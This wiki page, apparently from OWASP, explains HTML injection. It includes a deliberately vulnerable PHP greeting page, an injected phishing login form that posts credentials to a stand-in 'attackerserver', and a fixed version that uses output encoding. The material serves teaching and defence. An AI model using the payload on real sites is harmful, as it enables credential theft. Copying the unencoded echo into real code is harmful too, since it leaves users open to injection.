Difference between revisions of "HTML Injection"

Hypertext Markup Language (HTML) injection, also sometimes referred to as ''virtual defacement'', is an attack on a user made possible by an injection vulnerability in a web application. When an application does not properly handle user-supplied data, an attacker can supply valid HTML, typically via a parameter value, and inject their own content into the page.
This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust.
==HTML Injection vs. Cross-site Scripting==
HTML injection is an attack that is closely related to [[Cross-site Scripting (XSS)]]. The difference is not in the vulnerability, but in the type of attack that leverages the vulnerability. While XSS uses script tags to run JavaScript, HTML injection simply uses HTML to modify the page for malicious reasons.
==Risk Factors==
===Attack Example===
A possible attack scenario is demonstrated below:
# Attacker discovers injection vulnerability and decides to use an HTML injection attack
# Attacker crafts malicious link, including his injected HTML content, and sends it to a user via email
# The user visits the page because it is located within a trusted domain
# The attacker's injected HTML is rendered and presented to the user asking for a username and password
# The user enters a username and password, which are both sent to the attacker's server
: A simple PHP page containing an injection vulnerability via the ''name'' parameter:
<pre>
<?php
    // Vulnerable: the request parameter is copied into the page unencoded.
    $name = $_REQUEST['name'];
?>
<h1>Welcome to the Internet!</h1>
Hello, <?php echo $name; ?>!
<p>We are so glad you are here!</p>
</pre>
The page functionality can be tested by making the following GET request to the page:
When the link below is requested, the page renders the injected HTML, presents a login form, and comments out the rest of the page after the injection point. Once a user enters their username and password, the values are sent to a page named ''login.php'' on the attacker's server via POST.
<pre><h3>Please Enter Your Username and Password to Proceed:</h3><form method="POST"
action="http://attackerserver/login.php">Username: <input type="text" name="username" /><br />Password: <input type="password"
name="password" /><br /><input type="submit" value="Login" /></form><!--
</pre>
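The greeting page from the attack example with the ''name'' value HTML-encoded before it is written into the response, as an added example that is not part of the original page. The helper names h and greeting_name, the 64-byte cap and the "guest" fallback are assumptions made for illustration.

```php
<?php
// Added example: the same greeting page with output encoding applied to the
// 'name' parameter. Helper names, the length cap and the fallback value are
// illustrative assumptions, not part of the original page.
declare(strict_types=1);

/** Encode untrusted text for HTML element content or a quoted attribute value. */
function h(string $value): string
{
    // ENT_QUOTES encodes both ' and "; ENT_SUBSTITUTE replaces invalid UTF-8
    // with U+FFFD instead of making htmlspecialchars() return an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Read 'name' as a plain string with a length cap; anything else becomes "guest". */
function greeting_name(array $query): string
{
    $raw = $query['name'] ?? '';
    if (!is_string($raw)) {          // ?name[]=x arrives as an array, not a string
        return 'guest';
    }
    $raw = trim($raw);
    if ($raw === '') {
        return 'guest';
    }
    // Byte-wise cut; a split multibyte character is handled by ENT_SUBSTITUTE in h().
    return substr($raw, 0, 64);
}

// Declare the charset so the browser decodes the page the same way h() encoded it.
header('Content-Type: text/html; charset=UTF-8');
$name = greeting_name($_GET);
?>
<!DOCTYPE html>
<html>
<body>
    <h1>Welcome to the Internet!</h1>
    Hello, <?= h($name) ?>!
    <p>We are so glad you are here!</p>
</body>
</html>
```

With this version the injected markup is shown to the user as literal text: the angle brackets arrive as &amp;lt; and &amp;gt;, so no form is rendered and the trailing comment opener no longer hides the rest of the page.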
==Related [[Threat Agents]]==
* [[Threat Agent 1]]
* [[Threat Agent 2]]
==Related [[Attacks]]==
* [[Cross-site Scripting (XSS)]]
* [[:Category:Injection Attack]]
==Related [[Vulnerabilities]]==
* [[:Category:Input Validation Vulnerability]]
* [[Improper Data Validation]]
==Related [[Controls]]==
* [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]
* CERT Advisory on Malicious HTML Tags: http://www.cert.org/advisories/CA-2000-02.html
* OWASP's [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]
* OWASP Guide to Building Secure Web Applications and Web Services, Chapter 8: [[Data_Validation|Data Validation]]
* HTML Code Injection and Cross-site Scripting: http://www.technicalinfo.net/papers/CSS.html

Revision as of 15:35, 3 January 2013